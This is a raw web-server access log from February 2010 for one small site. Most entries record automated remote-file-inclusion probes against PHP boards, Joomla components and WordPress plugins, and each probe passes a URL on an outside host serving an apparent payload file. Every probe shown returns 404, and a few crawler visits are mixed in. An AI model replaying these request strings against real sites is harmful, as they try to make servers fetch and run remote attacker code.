75.125.84.226 - - [07/Feb/2010:02:25:53 -0800] "GET /logs////write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
75.125.84.226 - - [07/Feb/2010:02:25:53 -0800] "GET /logs/access.log%20%20////write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
75.125.84.226 - - [07/Feb/2010:02:25:55 -0800] "GET ///write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:02:31:45 -0800] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:02:31:45 -0800] "GET /logs//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:02:31:45 -0800] "GET /logs/access.log%20%20//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:02:32:28 -0800] "GET /logs//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:02:32:28 -0800] "GET /logs/access.log%20%20//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:02:32:28 -0800] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
75.125.84.226 - - [07/Feb/2010:02:33:50 -0800] "GET /logs/access.log////write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:36:21 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:36:21 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:36:22 -0800] "GET /logs/access.log%20%20//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:37:27 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:37:27 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:37:27 -0800] "GET /logs/access.log%20%20//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
109.72.80.134 - - [07/Feb/2010:02:38:00 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.72.80.134 - - [07/Feb/2010:02:38:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.72.80.134 - - [07/Feb/2010:02:38:01 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
88.198.197.249 - - [07/Feb/2010:02:41:56 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
88.198.197.249 - - [07/Feb/2010:02:41:57 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
88.198.197.249 - - [07/Feb/2010:02:41:57 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
72.55.146.200 - - [07/Feb/2010:02:44:31 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
72.55.146.200 - - [07/Feb/2010:02:44:31 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
72.55.146.200 - - [07/Feb/2010:02:44:31 -0800] "GET /logs/access.log//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
84.38.160.77 - - [07/Feb/2010:02:46:36 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "allattitudedoxies.com"
84.38.160.77 - - [07/Feb/2010:02:46:36 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "allattitudedoxies.com"
84.38.160.77 - - [07/Feb/2010:02:46:36 -0800] "GET /logs/access.log//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:20 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:20 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:20 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:56 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:56 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:57 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:57 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:57 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [07/Feb/2010:02:48:59 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
209.59.163.57 - - [07/Feb/2010:02:51:51 -0800] "GET /logs/access_091002.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
209.59.163.57 - - [07/Feb/2010:02:51:51 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
209.59.163.57 - - [07/Feb/2010:02:51:51 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:53:59 -0800] "GET /logs/access.log%20%20////write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:53:59 -0800] "GET ///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:53:59 -0800] "GET /logs////write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:55:17 -0800] "GET /logs/access.log%20%20////write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:55:17 -0800] "GET /logs////write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:55:17 -0800] "GET ///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:56:00 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:56:00 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:56:00 -0800] "GET /logs/access.log%20%20/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:56:04 -0800] "GET /logs////write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:56:04 -0800] "GET ///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [07/Feb/2010:02:56:04 -0800] "GET /logs/access.log%20%20////write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:58:18 -0800] "GET /logs/access.log//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:58:18 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:58:18 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:58:28 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:58:28 -0800] "GET /logs/access.log//bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.73.144.196 - - [07/Feb/2010:02:58:28 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
109.72.80.134 - - [07/Feb/2010:03:11:04 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.72.80.134 - - [07/Feb/2010:03:11:04 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.72.80.134 - - [07/Feb/2010:03:11:05 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
75.74.81.167 - - [07/Feb/2010:03:13:25 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inmonservicios.com//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
75.74.81.167 - - [07/Feb/2010:03:13:25 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inmonservicios.com//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
75.74.81.167 - - [07/Feb/2010:03:13:25 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inmonservicios.com//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [07/Feb/2010:03:26:41 -0800] "GET /main.php?sayfa=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [07/Feb/2010:03:26:41 -0800] "GET /logs//main.php?sayfa=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
95.108.150.235 - - [07/Feb/2010:03:26:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.allattitudedoxies.com"
218.38.136.125 - - [07/Feb/2010:03:26:44 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
95.108.150.235 - - [07/Feb/2010:03:26:45 -0800] "GET / HTTP/1.1" 200 924 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.allattitudedoxies.com"
95.108.150.235 - - [07/Feb/2010:03:26:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "allattitudedoxies.com"
95.108.150.235 - - [07/Feb/2010:03:26:47 -0800] "GET / HTTP/1.1" 200 924 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.allattitudedoxies.com"
95.108.150.235 - - [07/Feb/2010:03:26:48 -0800] "GET / HTTP/1.1" 200 924 "-" "Yandex/1.01.001 (compatible; Win16; H)" "allattitudedoxies.com"
95.108.150.235 - - [07/Feb/2010:03:26:51 -0800] "GET / HTTP/1.1" 200 924 "-" "Yandex/1.01.001 (compatible; Win16; H)" "allattitudedoxies.com"
218.38.136.125 - - [07/Feb/2010:03:28:20 -0800] "GET /main.php?sayfa=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [07/Feb/2010:03:28:20 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [07/Feb/2010:03:28:20 -0800] "GET /logs//main.php?sayfa=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.194.248 - - [07/Feb/2010:03:30:01 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygalleryadmin.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.194.248 - - [07/Feb/2010:03:30:01 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygalleryadmin.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.194.248 - - [07/Feb/2010:03:30:01 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygalleryadmin.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:03:32:16 -0800] "GET /logs/access.log%20%20//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:03:32:16 -0800] "GET /logs//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:03:32:16 -0800] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
88.198.197.249 - - [07/Feb/2010:03:32:33 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
88.198.197.249 - - [07/Feb/2010:03:32:34 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
88.198.197.249 - - [07/Feb/2010:03:32:34 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:03:32:58 -0800] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:03:32:58 -0800] "GET /logs//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.126 - - [07/Feb/2010:03:32:58 -0800] "GET /logs/access.log%20%20//wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.221.91.55 - - [07/Feb/2010:03:33:32 -0800] "GET /logs/access.log//export.php?mosConfig.absolute.path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.221.91.55 - - [07/Feb/2010:03:33:32 -0800] "GET /export.php?mosConfig.absolute.path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.221.91.55 - - [07/Feb/2010:03:33:33 -0800] "GET /logs//export.php?mosConfig.absolute.path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.194.248 - - [07/Feb/2010:03:34:54 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygalleryadmin.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.194.248 - - [07/Feb/2010:03:34:54 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygalleryadmin.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.194.248 - - [07/Feb/2010:03:34:54 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygalleryadmin.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.108.61.176 - - [07/Feb/2010:03:35:20 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
211.108.61.176 - - [07/Feb/2010:03:35:21 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
211.108.61.176 - - [07/Feb/2010:03:35:22 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
115.68.4.44 - - [07/Feb/2010:03:44:00 -0800] "GET /logs//index.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [07/Feb/2010:03:44:00 -0800] "GET /logs/access.log//index.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
115.68.4.44 - - [07/Feb/2010:03:44:01 -0800] "GET /index.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
67.195.112.92 - - [07/Feb/2010:03:45:55 -0800] "GET /logs/?S=A HTTP/1.0" 200 1494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
203.247.66.177 - - [07/Feb/2010:03:53:09 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.247.66.177 - - [07/Feb/2010:03:53:09 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.247.66.177 - - [07/Feb/2010:03:53:09 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
203.247.66.177 - - [07/Feb/2010:04:00:54 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
203.247.66.177 - - [07/Feb/2010:04:00:54 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
203.247.66.177 - - [07/Feb/2010:04:00:54 -0800] "GET /logs/access_091002.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
67.218.116.130 - - [07/Feb/2010:04:02:54 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:03:00 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:03:00 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:03:00 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:03:10 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:03:10 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:03:10 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
69.175.91.162 - - [07/Feb/2010:04:04:28 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
69.175.91.162 - - [07/Feb/2010:04:04:28 -0800] "GET /logs/access.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
69.175.91.162 - - [07/Feb/2010:04:04:28 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:04:40 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.1.150.2 - - [07/Feb/2010:04:04:45 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
